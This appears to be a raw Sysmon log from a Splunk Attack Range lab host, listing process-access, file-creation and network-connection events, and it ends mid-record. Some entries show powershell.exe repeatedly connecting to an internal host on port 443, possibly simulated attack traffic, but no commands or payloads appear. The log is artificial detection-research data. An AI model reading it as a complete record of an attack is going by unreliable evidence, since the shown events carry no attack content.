14:56:17.363{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.363{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.363{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.363{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.363{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-7211-613B-1BB4-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.363{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7211-613B-1BB4-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.358{B81B27B7-7211-613B-1BB4-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:18.763{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAB25726D86F225AB8360732079C7E41,SHA256=4A53B80602C5A92829B1EB83123C6389E2820FC2EA7D18C67A230F9C4E16DB1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:43.707{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52338-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:18.594{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70C11C234A474BE2D2327728BC27CFED,SHA256=2CB38DFFB9C80B91F7774F2472EDF2DB93E2DF6A81FB248F3184CEB23EE5946C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:18.594{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA051948AF070222FCB2B8B6DF9A4169,SHA256=64DD8F25C643B46E9836CED3CFB708B94F747C384318DBAA4D80236DA52F80DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:19.779{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCE28B980504870CAEE4192A0999EB5A,SHA256=B8760923D6B3111987503FBB60646CC8DE1BA48988A574518BD23922BC6E7F6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:20.794{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C2264085163E67D600AAEDF90D982EB,SHA256=027E71053853E52B3D2F72C62114F1DABE9C5B0893F4C3D895CEF268A1883231,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:21.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=183B2BFC5315E52937661462A151819E,SHA256=FBCA82B0C862D310394DEDF171D7ED29443405A61AE13A26FCAA964989A2453F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:46.137{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52339-false10.0.1.12-8000- 23542300x800000000000000035341790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:22.959{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:22.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04B3B809AF6DC041921A7F31E6BBFDCF,SHA256=52143A3335D91D3121B5719359AF47167A233649485233DD9A97FCE2F4182C7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:22.808{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5C6423F0C0D39E9F64C22736560A56D5,SHA256=34136503778140DF69F25C3C39CFD3348021CF7D69B6D71CD93CE89DD7C42027,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:23.838{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5A9D1125102AC41EC2B9564B83B242E,SHA256=F18E73445198F3D6B901144C70F23B4E246080D31243845F7C1CDD1570C2A562,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:48.774{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52340-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:24.862{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=504A5895864C5948FE75181BE39A55FB,SHA256=D27B888663B875FEC34AB8521B58C3AD1C7FBEB7B9E573795FEE1C7CE2C1DD08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:49.777{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.15win-host-987.attackrange.local138netbios-dgm 354300x800000000000000035341793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:49.777{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x800000000000000035341797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:25.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC02AE50E1FD3107D8912AFB5D29956D,SHA256=5A9B67BACC4DDEA567C9588F8B86FE02C8B4061B41CE8548F1EB66866A0BC42F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:49.935{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52341-false10.0.1.12-8089- 23542300x800000000000000035341800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:26.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0967B63CAA632496D749E2CFF2AFFA73,SHA256=5CB0DB4522EEF6DB2B8EF7D5E463D903E6EC90EDB26A86672C7FE34C261A41C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:26.893{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=380B20C15B54139216FD7C02F4405F7B,SHA256=9DE0FB7C3ADDECD07A3424A912CE4F18F2D16185F2388BD8A2E0D862D0A67EE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:51.171{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52342-false10.0.1.12-8000- 23542300x800000000000000035341802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:27.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F420622E3B4B5B0E3521DC84E698BD3B,SHA256=E677996B5B8B7FE5BD7BFFBF5BB622138BA22D939FB4F41F65473106758615BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:52.776{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52343-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:28.922{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AE8043987E2C4CC9262E9AF67B79EB,SHA256=6470D71710085ADB0EF413656BA8B63A122200631D2A7FAEEEC54BC83218E706,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:29.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C586A55D7B802D3F8FB9AD9AF5EA931F,SHA256=87B36C5C1F2ED0193FB6CF2CFDF9D157C4B122E6C13995292D1D2BBD397C7E1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:30.958{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B76DD8CC509F1DE099D402059F584CBA,SHA256=17FD6F44252E1A578CA104914ABC64A80AC55CF00C9F79AFDA4B096FB161155E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:30.877{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7153B0F9FB42D0B8FF295BF792FD9AC0,SHA256=5BE9FBCE6DEC3877F186B85782E855679B5A0CCE0005C35AC178607504AAFD17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.923{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-721F-613B-1EB4-03000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.923{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.923{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.923{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.923{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.923{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-721F-613B-1EB4-03000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.923{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-721F-613B-1EB4-03000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.908{B81B27B7-721F-613B-1EB4-03000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 